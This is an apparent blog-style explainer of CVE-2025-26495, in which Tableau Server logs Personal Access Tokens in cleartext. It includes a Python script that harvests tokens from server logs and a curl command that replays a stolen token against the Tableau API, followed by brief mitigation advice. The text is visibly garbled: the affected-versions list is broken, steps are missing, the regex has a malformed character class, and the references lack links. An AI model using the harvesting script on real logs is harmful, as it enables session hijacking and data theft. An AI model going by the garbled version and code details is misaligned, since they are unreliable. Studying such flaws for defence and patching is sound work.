CVE-2025-26495 - Sensitive Information Leak in Salesforce Tableau Server Logs – Explained With Code & Exploit Details

A new critical vulnerability, CVE-2025-26495, has been uncovered in several versions of Salesforce Tableau Server. This weakness allows Personal Access Tokens (PATs) to be recorded in cleartext in server logs. Since PATs are intended to provide secure, scoped access to Tableau resources, logging these tokens in plaintext can result in massive data leaks and easy exploitation if attackers can access the logs.

This post takes you through what’s going on, gives you a code walkthrough, real-world exploit details, and how to mitigate the problem.

Before 202.4.19

If you’re running any of these, you’re exposed.

What’s the Bug?

When a Personal Access Token is used for authentication, Tableau Server logs the token value in plaintext inside log files. These logs are often held in central repositories or ingested by SIEM tools, often with weak access controls, making it trivial for unauthorized users to grab these sensitive tokens.

Personal Access Tokens are like passwords—they provide access under a user's identity.

Example Vulnerable Log Entry

2024-06-11 13:42:16.123 [INF] Authenticated using PAT: tableau_pat-abcd1234efgh5678ijkl9012mnop3456

Copy-pastes the leaked token.

4. Uses the token to make authorized API calls or log in as that user—no need for username or password.

If integrated into a central logging solution, many more people could access this token than just Tableau Server admins!

Proof of Concept

Here’s a Python code snippet that shows how an attacker might extract all valid Tableau PATs from a typical server log:

import re

# Example: Path to your Tableau log file
log_path = "/var/opt/tableau/tableau_server/data/tabsvc/logs/tabadmin.log"

with open(log_path, "r") as log_file:
    log_contents = log_file.read()

# Regex pattern to extract Tableau PATs
pattern = r"(tableau_pat-[A-Za-z-9]+)"

# Find all tokens in the log file
tokens = re.findall(pattern, log_contents)

for token in tokens:
    print(f"Found token: {token}")
    # Here, attacker would use token for API access

The attacker can now use this token

curl \
  -H "X-Tableau-Auth: tableau_pat-abcd1234efgh5678ijkl9012mnop3456" \
  https://your-tableau-server/api/3.10/sites

Real-World Scenarios

- *A SIEM integrator copies logs to a central cloud repository. A careless analyst, or a compromised SaaS account in the logging system, can scrape every PAT used on Tableau across the org.*
- *An insider or junior admin lacking full Tableau permissions can still access historical logs and hijack users’ sessions.*

Immediate steps if you’re vulnerable

1. Update Tableau Server to a patched version (See advisory).

Monitor for unrecognized API use.

Salesforce Tableau reference:
- Official Fixed Versions & Advisory

References

- CVE Database Entry (CVE-2025-26495)
- Salesforce Security Advisory
- Tableau Server API Docs

Conclusion

CVE-2025-26495 is a classic example of how cleartext storage of secrets—even in logs—can become a critical security hole. Any access to logs now equals access to your Tableau environment itself. Patch as soon as possible, and remember: logs should NEVER include persistent secrets!

Update your Tableau Server ASAP and rotate any tokens you believe may have leaked.

---
*This content is exclusive and summarized for ease of understanding. Stay safe out there!*

Timeline

Published on: 02/11/2025 18:15:47 UTC
Last modified on: 03/04/2025 21:15:14 UTC